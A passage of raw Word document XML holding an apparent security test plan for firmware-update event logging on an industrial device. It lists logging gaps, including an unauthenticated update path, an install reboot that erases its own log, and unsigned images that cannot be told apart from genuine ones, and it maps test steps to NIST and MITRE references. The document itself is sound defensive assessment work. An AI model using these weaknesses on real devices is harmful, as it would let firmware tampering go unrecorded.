        <w:t xml:space="preserve"> FW-update actions, self-detected errors, SysCom timeout (SRIO-10665).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898FB6C" w14:textId="118C66AA" w:rsidR="00A779E7" w:rsidRPr="00A779E7" w:rsidRDefault="00A779E7" w:rsidP="00A779E7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SysCom update command/response events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> USER_SYS_RSP_UPDATE_* (SRIO-10785).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF25C1D" w14:textId="4546796E" w:rsidR="00A779E7" w:rsidRPr="00A779E7" w:rsidRDefault="00A779E7" w:rsidP="00A779E7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/firmware/version + I&amp;M0 SOFTWARE_REVISION delta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Version change is observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4A45F" w14:textId="151961A5" w:rsidR="00A779E7" w:rsidRPr="00A779E7" w:rsidRDefault="00A779E7" w:rsidP="00A779E7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update-state LED sequence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>US green / FS on fail (SRIO-11359 ff.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD4A92" w14:textId="042DF228" w:rsidR="007E0FF7" w:rsidRPr="00A779E7" w:rsidRDefault="00A779E7" w:rsidP="00A779E7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug/test interface declared development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F1293" w14:textId="77777777" w:rsidR="00506E31" w:rsidRPr="00506E31" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C0642" w14:textId="30EB23CA" w:rsidR="003E642C" w:rsidRPr="003E642C" w:rsidRDefault="003E642C" w:rsidP="003E642C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-</w:t>
      </w:r>
      <w:r w:rsidR="00BA5770">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Events recorded without actor identity; no user auth on the FW-update path (password removed, SRIO-8299) </w:t>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.12 unmet. An illegitimate intervention avoiding the official path is unrecorded/unattributable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8DB08" w14:textId="192B487F" w:rsidR="003E642C" w:rsidRPr="003E642C" w:rsidRDefault="003E642C" w:rsidP="003E642C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RQ-008 demands evidence of BOTH legitimate AND illegitimate intervention. The evidence footprint of a genuine update and a modified/unsigned image is identical (‘update completed’ + version change). Cause = no signature verification, but that PROTECTION gap is RQ-005 (TC-RQ005-03); here the finding is that the evidence cannot CLASSIFY the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45879F91" w14:textId="3E5D33AA" w:rsidR="003E642C" w:rsidRPr="003E642C" w:rsidRDefault="003E642C" w:rsidP="003E642C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /firmware/install ‘initiates a reboot to install’ (SRIO-2953) and Exit-Update requires a power reset (SRIO-9916); a cold start clears the log (SRIO-6521) and resets uptime (SRIO-15398). The act of installing software destroys the log evidence of that installation. (The 5-year retention dimension </w:t>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RQ-012.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CF9128" w14:textId="786E576A" w:rsidR="009E26C9" w:rsidRDefault="003E642C" w:rsidP="003E642C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E642C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Production_fuse exclusion (EDR 2.13); a re-probe still generates no log entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624C7BC" w14:textId="77777777" w:rsidR="008903AE" w:rsidRDefault="008903AE" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CAEEC0" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00272A3D" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7619C9" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1D0F6A" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362B4874" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FF1B41" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6240F821" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397B46B4" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416B39B1" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C07AD37" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D65EB" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D12BA27" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="007702A5" w:rsidRDefault="009C0A46" w:rsidP="007702A5">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007702A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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14:paraId="7F05B0C8"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032D26B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68BF3DDE"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0BB5562D"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46B7BEBC"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121D099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SVV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="007F5798" w14:paraId="081CD9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5BDB13" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16F02978" w14:textId="620E4312" w:rsidR="00B73A1A" w:rsidRPr="004B30E0" w:rsidRDefault="00EE3BC8"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30E0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enumerate the software-event evidence that exists: Error Log, /firmware/version, I&amp;M0 SOFTWARE_REVISION at baseline (no REVISION_COUNTER/I&amp;M4, those are RQ-009)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1673919A" w14:textId="6F6DA3BE" w:rsidR="00B73A1A" w:rsidRPr="000B6DC9" w:rsidRDefault="00FA5E4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B6DC9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional baseline (CR 6.1; CR 2.8 partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC52733" w14:textId="77777777" w:rsidR="000B6DC9" w:rsidRPr="000B6DC9"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B6DC9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirements-based verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AA56C7A" w14:textId="5C2FA476" w:rsidR="00B73A1A" w:rsidRPr="000B6DC9"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B6DC9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673F729D" w14:textId="106E154B" w:rsidR="00B73A1A" w:rsidRPr="000B6DC9"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B6DC9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D258C9" w14:paraId="1168F5C8"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55C7AC37" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3363F631" w14:textId="75E22750" w:rsidR="00B97F60" w:rsidRPr="00B97F60"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97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Perform a legitimate </w:t>
            </w:r>
            <w:r w:rsidR="00B97F60" w:rsidRPr="00B97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="00B97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FW update; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6826A1C1" w14:textId="5D021171" w:rsidR="00B73A1A" w:rsidRPr="00B97F60"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97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>capture whether a retained, time-stamped, attributed record survives the install reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1858E8" w14:textId="32B351D8" w:rsidR="00B73A1A" w:rsidRPr="00B97F60" w:rsidRDefault="00A435F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97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-3 (self-erasing install) + G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A17966C" w14:textId="1E0F9874" w:rsidR="00B73A1A" w:rsidRPr="00B97F60" w:rsidRDefault="00154D1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97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 / §7 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F2746B" w14:textId="69BD2BA2" w:rsidR="00B73A1A" w:rsidRPr="00B97F60" w:rsidRDefault="00FD642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97F60">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D0764E" w14:paraId="4F35E98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2A9A305" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32DAA4F6" w14:textId="77777777" w:rsidR="00670F7C" w:rsidRPr="00670F7C" w:rsidRDefault="00114E2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70F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Compare evidence footprints of a legitimate update vs the modified/unsigned image installed in TC-RQ005-03; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DFB47C" w14:textId="37B4EC51" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="00114E2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70F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>check whether the log distinguishes them</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611BBF55" w14:textId="280145D6" w:rsidR="00B73A1A" w:rsidRPr="00670F7C" w:rsidRDefault="003F23DD"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70F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2 (evidence cannot classify</w:t>
            </w:r>
            <w:r w:rsidR="006E3D06">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0087F8E6" w14:textId="5EDEC408" w:rsidR="00B73A1A" w:rsidRPr="002377AA" w:rsidRDefault="008E2CD5"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377AA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0872; OWASP ISTG-FW[UPDT]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B643AEF" w14:textId="24421B9E" w:rsidR="00B73A1A" w:rsidRPr="00670F7C"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70F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00035F89" w14:paraId="18C070F6"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24D7580" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A1A0F1" w14:textId="00C0098D" w:rsidR="00B73A1A" w:rsidRPr="00B8368A" w:rsidRDefault="006148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4884">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Time-attribution across the install cold start (reuse TC-RQ003-04 method): uptime resets, no absolute timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63A8178A" w14:textId="542CFDFD" w:rsidR="00B73A1A" w:rsidRPr="00B8368A" w:rsidRDefault="00A865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8368A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1/CR 2.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429BE8BE" w14:textId="623B1A85" w:rsidR="00B73A1A" w:rsidRPr="00B8368A" w:rsidRDefault="0004467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8368A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="723C922B" w14:textId="7C461BEC" w:rsidR="00B73A1A" w:rsidRPr="00B8368A" w:rsidRDefault="007540B2"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8368A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="008171E4" w14:paraId="3C2BA929" w14:textId="77777777" w:rsidTr="00344CAC">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1130"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BA523A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF15222" w14:textId="544010D8" w:rsidR="00B73A1A" w:rsidRPr="00344CAC" w:rsidRDefault="00344CA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44CAC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Attempt the production-gated FIT path (/fit/setfit, WO/P); confirm exclusion produces no log entry (reuse RQ-003 Scenario 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FBADC9" w14:textId="77777777" w:rsidR="004577E5" w:rsidRPr="004577E5"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577E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Validates EDR 2.13; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E8E51A" w14:textId="27243B17" w:rsidR="00B73A1A" w:rsidRPr="004577E5"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577E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirms G-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D67F80A" w14:textId="77777777" w:rsidR="00D31F74" w:rsidRPr="0016260A"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6260A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §4.2; </w:t>
            </w:r>
          </w:p>
